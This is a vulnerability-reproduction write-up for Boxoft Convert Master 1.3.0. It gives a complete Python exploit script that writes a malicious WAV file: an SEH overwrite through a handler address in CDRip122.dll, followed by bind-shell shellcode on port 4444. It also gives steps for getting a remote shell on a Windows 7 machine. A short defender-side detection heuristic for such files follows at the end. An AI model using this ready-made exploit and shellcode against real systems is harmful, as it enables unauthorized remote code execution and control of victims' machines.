Binary security: reproducing the Convert Master vulnerability: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit

The script used for this reproduction (the original PoC is Python 2; it is written here for Python 3 with bytes literals, with the same behaviour):

```python
import struct

# Filler that runs up to the SEH record
buffer = b"\x41" * 4132
# nSEH: jmp short +6, skipping over the handler address into the NOP sled
nseh = b"\xeb\x06\x90\x90"
# SEH: handler address inside CDRip122.dll
seh = struct.pack('<L', 0x6d00c683)
nops = b"\x90" * 20
# Bind shellcode, port 4444
shellcode = (
    b"\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
    b"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
    b"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
    b"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
    b"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
    b"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
    b"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
    b"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
    b"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
    b"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
    b"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
    b"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
    b"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
    b"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
    b"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
    b"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
    b"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
    b"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
    b"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
    b"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
    b"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
    b"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
    b"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
    b"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
    b"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
    b"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
    b"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
    b"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
    b"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
    b"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
    b"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
    b"\xc8\x28\x1b\xd5\x3f\x51"
)

payload = buffer + nseh + seh + nops + shellcode

try:
    with open("Evil.wav", "wb") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except OSError:
    print("File cannot be created")
```

1. Run the Python code: Boxoft_Convert_Master.py
2. Open Boxoft_Convert_Master.exe
3. Click try and Batch Convert Mode
4. Add Evil.wav
5. And you will have a bind shell on port 4444
6. Greetings go to: XiDreamzzXi, Metatron

Run the script to produce the wav file, which contains the shellcode; drag it into Convert Master and the program crashes; then connect remotely with Telnet to the Windows 7 machine to get a shell.
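As an added defender-side example (not part of the original post or the PoC), a small Python heuristic that flags a file with the payload layout the script above produces: no RIFF/WAVE header, a long single-byte filler run, and a short-jump stub where nSEH lands. The sample bytes, the 1024-byte run threshold and the placeholder "shellcode" region are constructed here; the SEH address is the one quoted in the PoC.

```python
import struct

# Constructed sample with the layout of the PoC payload, but no real shellcode:
# filler, nSEH short-jump stub, packed SEH address, NOP sled, placeholder bytes.
SAMPLE_OVERFLOW = (
    b"\x41" * 4132
    + b"\xeb\x06\x90\x90"              # nSEH: jmp short +6
    + struct.pack("<L", 0x6D00C683)    # SEH address quoted in the PoC (CDRip122.dll)
    + b"\x90" * 20
    + b"\xcc" * 16                     # placeholder standing in for the shellcode
)

def minimal_wav(n_samples=4):
    """Constructed well-formed 16-bit mono PCM WAV holding n_samples of silence."""
    pcm = b"\x00\x00" * n_samples
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(pcm)) + pcm)
    return b"RIFF" + struct.pack("<I", len(body)) + body

def longest_run(data):
    """Return (byte_value, length, end_offset) of the longest run of one byte."""
    best = (None, 0, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i, j)
        i = j
    return best

def seh_overflow_indicators(data, min_run=1024):
    """Heuristic indicators of an SEH-overwrite file posing as WAV.
    Returns the list of matched indicator names (empty = nothing suspicious)."""
    found = []
    if not (data[:4] == b"RIFF" and data[8:12] == b"WAVE"):
        found.append("missing RIFF/WAVE header")
    _, run_len, run_end = longest_run(data)
    if run_len >= min_run:
        found.append("long single-byte filler run")
        # The PoC puts a 'jmp short' stub (0xEB xx) right after the filler, at nSEH.
        if data[run_end:run_end + 1] == b"\xeb":
            found.append("short-jump stub after filler (nSEH pattern)")
    return found
```

The same three checks can be run over any file a converter is about to open, before handing it to the parsing code.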